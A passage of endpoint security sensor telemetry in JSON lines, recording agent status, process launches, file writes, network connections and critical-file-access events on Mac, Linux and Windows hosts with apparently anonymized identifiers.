-{"AgentVersion":"6.24.13701.0","aip":"208.180.129.90","ConfigIDBase":"65994753","BiosReleaseDate":"01/06/2021","CpuFeaturesMask":"7494065083858915","ChasisManufacturer":"Apple Inc.","SystemSerialNumber":"C02F649EMD6R","event_platform":"Mac","AgentLoadFlags":"0","CpuVendor":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","BiosVersion":"1554.80.3.0.0 (iBridge: 
18.16.14347.0.0,0)","CpuSignature":"591594","EffectiveTransmissionClass":"0","MoboProductName":"Mac-E1008331FDC96864","timestamp":"1625677460451","MicrocodeSignature":"16045690984229358334","event_simpleName":"AgentOnline","ContextTimeStamp":"1625677445.731","SystemProductName":"MacBookPro16,1","MoboManufacturer":"Apple Inc.","ConfigStateHash":"3967242894","ConfigBuild":"1007.4.0013701.1","SystemSku":" ","SensorGroupingTags":"","ConfigurationVersion":"10","AgentLocalTime":"1625677445.731","BiosManufacturer":"Apple Inc.","Entitlements":"15","name":"AgentOnlineMacV13","ConfigIDPlatform":"4","ComputerName":"comp2","ChassisType":"9","ConfigIDBuild":"13701","SystemManufacturer":"Apple Inc.","aid":"ffffffffbea440b9aad8b5bf222d303f","ProvisionState":"1","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"Zero"}
-{"event_simpleName":"CriticalFileAccessed","ContextTimeStamp":"1625677438.515","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053399098988534","ContextThreadId":"0","aip":"208.93.153.49","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileAccessedMacV1","id":"ffffffff-1111-11eb-956a-02748d01bd3d","EffectiveTransmissionClass":"2","aid":"ffffffff8eca418b7a861be9c5f7de1d","timestamp":"1625677438553","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/daemon.plist"}
-{"MajorVersion":"19","event_simpleName":"OsVersionInfo","OSVersionFileData":"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","ConfigStateHash":"3967242894","AgentVersion":"6.24.13701.0","aip":"208.180.129.90","MinorVersion":"6","OSVersionString":"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; 
root:xnu-6153.141.16~1/RELEASE_X86_64","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OsVersionInfoMacV3","RFMState":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","OSVersionFileName":"/System/Library/CoreServices/SystemVersion.plist","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677462356","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"ConfigBuild":"1007.8.0010912.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1284133626","ConfigStateData":"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV1","aip":"208.233.129.250","id":"ffffffff-1111-11eb-8e88-068a8894a447","aid":"ffffffff4f4044b689d6420d303e4ecd","timestamp":"1625677436454","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"1333055909","aip":"208.203.151.21","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53","DownloadPort":"443","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"LFODownloadConfirmationLinV1","CompletionEventId":"Event_KmaExtDownloadCompleteLinV1","id":"ffffffff-1111-11eb-8dee-0201f64cca29","aid":"ffffffff88b948c6abeeee910f6d8c33","timestamp":"1625677365906","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"KernelModuleArchiveExt11611"}
-{"event_simpleName":"TarFileWritten","ContextTimeStamp":"1625677353.633","ConfigStateHash":"3090255842","ContextProcessId":"365049009681176519","ContextThreadId":"0","aip":"208.23.66.52","FileIdentifier":"050000010000000000000000000000005749420100000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"TarFileWrittenMacV1","id":"ffffffff-1111-11eb-9497-028a0bfcf603","EffectiveTransmissionClass":"2","aid":"ffffffffe6244708bd09a6c111f63f4a","timestamp":"1625677353895","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem"}
-{"event_simpleName":"AgentConnect","ConfigStateHash":"3967242894","NetworkContainmentState":"0","VerifiedCertificate":"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf","aip":"208.42.18.78","ConfigIDBase":"65994753","FailedConnectCount":"404","ConnectType":"1","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"AgentConnectMacV5","ConfigIDPlatform":"4","PreviousConnectTime":"1625673963.331","id":"ffffffff-1111-11eb-ba54-02a3616f6acd","ConfigIDBuild":"13701","ConnectTime":"1625677350.208","EffectiveTransmissionClass":"2","aid":"ffffffff2977460db2898ece881a9358","ProvisionState":"0","timestamp":"1625677350466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"3090255842","aip":"208.25.66.51","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys","DownloadPort":"443","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LFODownloadConfirmationMacV1","CompletionEventId":"Event_ChannelDataDownloadCompleteMacV1","id":"ffffffff-1111-11eb-8b09-069ee8920171","EffectiveTransmissionClass":"0","aid":"ffffffff5e8b4724aa10088c4f71cd9a","timestamp":"1625677525235","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"C-00000503-00000000-00000001.sys"}
-{"event_simpleName":"AsepFileChange","ContextTimeStamp":"1625677482.148","ConfigStateHash":"1620585913","ContextProcessId":"364936256754041721","ContextThreadId":"0","aip":"208.140.108.235","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"AsepFileChangeMacV1","id":"ffffffff-1111-11eb-9e50-064be6e56df7","EffectiveTransmissionClass":"2","aid":"fffffffff1a64286a233d09974b1b377","timestamp":"1625677482403","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs","VnodeModificationType":"6"}
-{"event_simpleName":"TerminateProcess","RawProcessId":"76482","ContextTimeStamp":"1625677510.959","ConfigStateHash":"1284133626","ContextProcessId":"130732827553316","ContextThreadId":"0","aip":"208.194.125.248","ConfigBuild":"1007.8.0010912.1","event_platform":"Lin","TargetProcessId":"130732827553316","Entitlements":"15","name":"TerminateProcessLinV2","id":"ffffffff-1111-11eb-97d0-02b2813216eb","EffectiveTransmissionClass":"2","aid":"ffffffffdd094539a02b394c69a70aaf","timestamp":"1625677511067","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"ConfigBuild":"1007.4.0013701.1","event_simpleName":"FirewallEnabled","event_platform":"Mac","ConfigStateHash":"3090255842","Entitlements":"15","name":"FirewallEnabledMacV1","aip":"208.31.114.187","id":"ffffffff-1111-11eb-a9e6-067d21325a03","EffectiveTransmissionClass":"2","aid":"ffffffff70cf4070af024397f25007c7","timestamp":"1625677372544","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"FsVolumeUnmounted","VolumeName":"Install Google Drive","ContextTimeStamp":"1625677332.283","ConfigStateHash":"3090255842","aip":"208.105.245.7","VolumeMediaBSDName":"disk2s2","VolumeMountPoint":"/private/tmp/KSInstallAction.dn6J5Xa1M4/m","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"FsVolumeUnmountedMacV1","id":"ffffffff-1111-11eb-8fd9-06866dcbd3d5","EffectiveTransmissionClass":"2","aid":"ffffffffed984e248973f3ada1eb543d","timestamp":"1625677334451","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"}
-{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677474.525","ConfigStateHash":"2300098580","ConnectionFlags":"0","ContextProcessId":"328911864662804336","RemotePort":"0","aip":"208.231.69.37","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"23165","Entitlements":"15","name":"NetworkListenIP4LinV5","id":"ffffffff-1111-11eb-88fd-06a17d0fdc05","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff2a0d484da8f7a9cf8bde7164","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677474879","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"ELFFileWritten","ContextTimeStamp":"1625677526.828","ConfigStateHash":"1620585913","ContextProcessId":"363122200934575406","Size":"38798952","ContextThreadId":"0","aip":"208.24.116.10","SHA256HashData":"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027","FileIdentifier":"040000010000000000000000000000006793f80200000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ELFFileWrittenMacV1","id":"ffffffff-1111-11eb-985c-02152dd35bc1","ELFSubType":"4","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677527114","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe"}
-{"MajorVersion":"4","event_simpleName":"OsVersionInfo","OSVersionFileData":"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a","BootArgs":"BOOT_IMAGE\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\u003dUUID\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\u003dtty0 console\u003dttyS0,115200n8 net.ifnames\u003d0 biosdevname\u003d0 nvme_core.io_timeout\u003d4294967295 rd.emergency\u003dpoweroff rd.shell\u003d0","ConfigStateHash":"3712162471","AgentVersion":"6.19.11611.0","aip":"208.203.151.21","MinorVersion":"14","OSVersionString":"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 
x86_64","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"OsVersionInfoLinV4","RFMState":"1","id":"ffffffff-1111-11eb-93d4-0624c36f3a79","OSVersionFileName":"/etc/os-release","aid":"ffffffff2d1245c0a32d5efcf9351272","timestamp":"1625677383466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"CriticalFileModified","ContextTimeStamp":"1625677439.099","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"364849347227309005","ContextThreadId":"0","aip":"208.216.154.14","FileIdentifier":"04000001000000000000000000000000cdf3100100000000","ConfigBuild":"1007.4.0013701.1","UID":"0","USN":"89566685","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileModifiedMacV2","id":"ffffffff-1111-11eb-9262-0268ab613b49","EffectiveTransmissionClass":"2","aid":"ffffffff761b4a7d9962dd9e7e776044","timestamp":"1625677439398","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/user9.plist/"}
-{"event_simpleName":"NeighborListIP6","ConfigStateHash":"3090255842","NeighborList":"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|","aip":"208.230.229.237","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP6MacV1","id":"ffffffff-1111-11eb-ac8a-06b5e1186139","EffectiveTransmissionClass":"3","aid":"ffffffff01c7450180352a7c58a28fb4","timestamp":"1625677489786","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677382.785","UserName":"user3","ConfigStateHash":"1325353086","ContextProcessId":"364952259879648742","Size":"8052","ContextThreadId":"0","aip":"208.182.203.47","SHA256HashData":"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6","FileIdentifier":"04000001000000000000000000000000ef07570000000000","ConfigBuild":"1007.4.0013806.1","event_platform":"Mac","IsOnRemovableDisk":"0","Entitlements":"15","name":"NewScriptWrittenMacV3","id":"ffffffff-1111-11eb-9dc1-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffffcebd42c0890d59b54279d3d3","timestamp":"1625677383057","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh"}
-{"event_simpleName":"SystemCapacity","ConfigStateHash":"1620585913","aip":"208.145.211.220","CpuClockSpeed":"2400000000","PhysicalCoreCount":"8","CpuFeaturesMask":"7494065083908067","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LogicalCoreCount":"16","Entitlements":"15","name":"SystemCapacityMacV1","CpuVendor":"0","CpuProcessorName":"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz","id":"ffffffff-1111-11eb-b714-066001392751","CpuSignature":"591597","EffectiveTransmissionClass":"3","aid":"fffffffff2c7432859ff6bbe1a0bd6af","ProcessorPackageCount":"1","MemoryTotal":"17179869184","timestamp":"1625677387216","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"event_simpleName":"FirmwareAnalysisStatus","ConfigStateHash":"3090255842","FirmwareAnalysisEclControlInterfaceVersion":"0","aip":"208.71.69.91","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","FirmwareAnalysisEclConsumerInterfaceVersion":"0","BootTimeFunctionalityLevel":"255","ReasonOfFunctionalityLevel":"3","CurrentFunctionalityLevel":"2","Entitlements":"15","name":"FirmwareAnalysisStatusMacV2","id":"ffffffff-1111-11eb-ba57-0214a0d89bf7","EffectiveTransmissionClass":"0","aid":"ffffffff0d7b4d839912e55b4755e85b","timestamp":"1625677368429","cid":"ffffffff15754bcfb5f9152ec7ac90ac","PciAttachmentState":"65535"}
-{"OutOctets":"0","CreationTimeStamp":"","aip":"208.160.204.13","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"utun2","InDiscards":"0","InterfaceIndex":"17","event_platform":"Mac","InterfaceType":"1","id":"ffffffff-1111-11eb-a272-0294ad12fbe7","PhysicalAddressLength":"0","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677504544","LocalAddressIP4":"208.27.234.231","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"3090255842","PhysicalAddress":"","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressIP4MacV1","aid":"ffffffff557f4b99a0afdea9ce8cd6fa","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
-{"CommandLine":"uname 
-a","ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","Entitlements":"15","GID":"0","ImageFileName":"/bin/uname","MD5HashData":"894356eb59e279696c304f07091b7fde","NDRoot":"321385814512398584","ParentProcessId":"321385814512398584","ProcessEndTime":"1604855099.126","ProcessGroupId":"0","ProcessStartTime":"1604855099.126","RGID":"0","RUID":"0","RawProcessId":"51342","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa","SVGID":"0","SVUID":"0","SessionProcessId":"314116638974342642","SourceProcessId":"321385814512398584","SourceThreadId":"0","TargetProcessId":"321385814512398605","UID":"0","aid":"ffffffff70d140ca9ba97f0dddd14137","aip":"208.216.134.209","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-ac87-06decddc17a1","name":"ProcessRollup2LinV5","timestamp":"1604855099681"}
-{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"317713210176499254","ContextThreadId":"0","ContextTimeStamp":"1604855096.730","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"28987","SHA256HashData":"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"317713210176499254","aid":"ffffffff75fc48f15cfe5f095e605c4c","aip":"208.3.106.158","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-809e-02fff4e55a49","name":"EndOfProcessMacV14","timestamp":"1604855099646"}
-{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"38188","ConHostProcessId":"3099352216141","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextData":"","ContextProcessId":"3100508103359","ContextThreadId":"93436292950223","ContextTimeStamp":"1604855097.926","CreateProcessCount":"0","CycleTime":"2937514388","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"1","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"2","GenericFileWrittenCount":"0","ImageSubsystem":"3","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"7500000","MaxThreadCount":"4","ModuleLoadCount":"38","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"3099350649383","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855096.463","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"33016","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"3100508103359","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRem
oteCount":"0","UserSid":"S-1-5-18","UserTime":"6406250","aid":"ffffffffb5db4b2e7ec89aba537adcc2","aip":"208.9.60.157","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"EndOfProcessV15","timestamp":"1604855099935"}
-{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","ContextProcessId":"311775981885093125","ContextThreadId":"0","ContextTimeStamp":"1604855101.341","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"10507","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"311775981885093125","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"208.14.207.30","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"EndOfProcessMacV12","timestamp":"1604855100139"}
-{"AuthenticationId":"999","CommandLine":"D:\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe 
--ps2","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume2\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe","ImageSubsystem":"3","IntegrityLevel":"16384","MD5HashData":"571391f723a439e985a2064337e2802a","ParentAuthenticationId":"999","ParentBaseFileName":"splunkd.exe","ParentProcessId":"17346335177","ProcessCreateFlags":"67634688","ProcessEndTime":"","ProcessParameterFlags":"24577","ProcessStartTime":"1604855099.406","ProcessSxsFlags":"64","RawProcessId":"6116","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720","SessionId":"0","SourceProcessId":"17346335177","SourceThreadId":"107650023406","Tags":"27, 151, 12094627905582, 12094627906234","TargetProcessId":"583707537390","TokenType":"1","UserSid":"S-1-5-18","WindowFlags":"384","aid":"ffffffff3a5a424fa02450da53619745","aip":"208.216.142.127","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-a09e-06f79d630255","name":"ProcessRollup2V17","timestamp":"1604855100030"}
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2784638081","ContextProcessId":"259090530891","ContextThreadId":"16409623709004","ContextTimeStamp":"1604855095.961","DnsRequestCount":"1","DomainName":"comp1.dom2","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff4f1444bab96568879cb43556","aip":"208.216.144.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DnsRequest","id":"ffffffff-1111-11eb-8077-0606f7dcf2ed","name":"DnsRequestV3","timestamp":"1604855099913"}
-{"ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","ContextProcessId":"321385820045701199","ContextThreadId":"0","ContextTimeStamp":"1604855101.645","Entitlements":"15","GID":"0","TargetFileName":"/etc/shadow","UID":"0","UnixMode":"32768","aid":"ffffffff32ba43a483e76c6f0a4aa26f","aip":"208.216.150.197","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"CriticalFileAccessed","id":"ffffffff-1111-11eb-b70d-027f9ced2001","name":"CriticalFileAccessedLinV1","timestamp":"1604855102247"}
-{"CommandLine":"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","Entitlements":"15","GID":"0","ImageFileName":"/usr/bin/plutil","MD5HashData":"d51cef1b288e2032aee9805deff04bfd","MachOSubType":"1","ParentProcessId":"311774817965726568","ProcessEndTime":"","ProcessGroupId":"311774817965726568","ProcessStartTime":"1604855111.240","RGID":"0","RUID":"0","RawProcessId":"10692","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SVGID":"0","SVUID":"0","SourceProcessId":"311776004953765502","SourceThreadId":"0","Tags":"27, 12094627905582, 12094627906234","TargetProcessId":"311776004953765502","UID":"0","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"208.14.207.30","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"ProcessRollup2MacV3","timestamp":"1604855109180"}
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3899738370","ContextProcessId":"1546527409909","ContextThreadId":"4711690090889","ContextTimeStamp":"1604855114.133","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00","FileObject":"18446655033844205120","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"88080484","ShareAccess":"1","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Windows\\Temp\\__PSScriptPolicyTest_dvkjnbka.apn.ps1","aid":"ffffffff8f1e4b77b4dae5debaa1c8bc","aip":"208.216.150.210","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewScriptWritten","id":"ffffffff-1111-11eb-80b5-06e11a66e03d","name":"NewScriptWrittenV7","timestamp":"1604855114427"}
-{"ConfigBuild":"1007.4.0012205.1","ConfigStateHash":"1306766522","ConnectionDirection":"1","ConnectionFlags":"0","ContextProcessId":"321275232072440993","ContextTimeStamp":"1604855116.421","Entitlements":"15","InContext":"0","LocalAddressIP4":"0.0.0.0","LocalPort":"0","Protocol":"6","RemoteAddressIP4":"208.72.48.107","RemotePort":"443","aid":"ffffffffd4094240a6b1d12aaf304f4f","aip":"208.216.150.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-aca9-02683aed2a0d","name":"NetworkConnectIP4MacV5","timestamp":"1604855116502"}
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2602391615","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"223442259384","ContextTimeStamp":"1604855116.849","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"208.22.254.101","LocalPort":"53961","Protocol":"6","RemoteAddressIP4":"208.91.140.216","RemotePort":"443","aid":"fffffffff000426eb99afaa2ccdcbc17","aip":"208.216.150.194","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-b0eb-06be7616c211","name":"NetworkConnectIP4V5","timestamp":"1604855116942"}
-{"AuthenticationId":"6580764513","AuthenticationPackage":"Negotiate","ClientComputerName":"-","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"816054990879","ContextThreadId":"52913017705957","ContextTimeStamp":"1604855091.781","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"NT AUTHORITY","LogonServer":"","LogonTime":"1604855091.781","LogonType":"9","PasswordLastSet":"","RemoteAccount":"1","UserFlags":"0","UserIsAdmin":"0","UserLogonFlags":"12","UserName":"SYSTEM","UserPrincipal":"user4@dom2","UserSid":"S-1-5-18","aid":"ffffffff8d2e4b4f9b21b40633a8d579","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogon","id":"ffffffff-1111-11eb-a8cf-0649c95cfa1d","name":"UserLogonV8","timestamp":"1604855121077"}
-{"AuthenticationId":"2007206396","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"4415814628770","ContextThreadId":"41392001729898","ContextTimeStamp":"1604855120.785","DiskParentDeviceInstanceId":"PCI\\VEN_1000\u0026DEV_0054\u0026SUBSYS_197615AD\u0026REV_01\\4\u00261f16fef7\u00260\u002600A8","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c","FileObject":"18446708893089967904","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","IsTransactedFile":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","SHA256HashData":"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182","Size":"6144","TargetFileName":"\\Device\\HarddiskVolume2\\Users\\user10\\AppData\\Local\\Temp\\ec1ijefl.dll","TokenType":"1","aid":"ffffffff2c47454cba360bc404a607b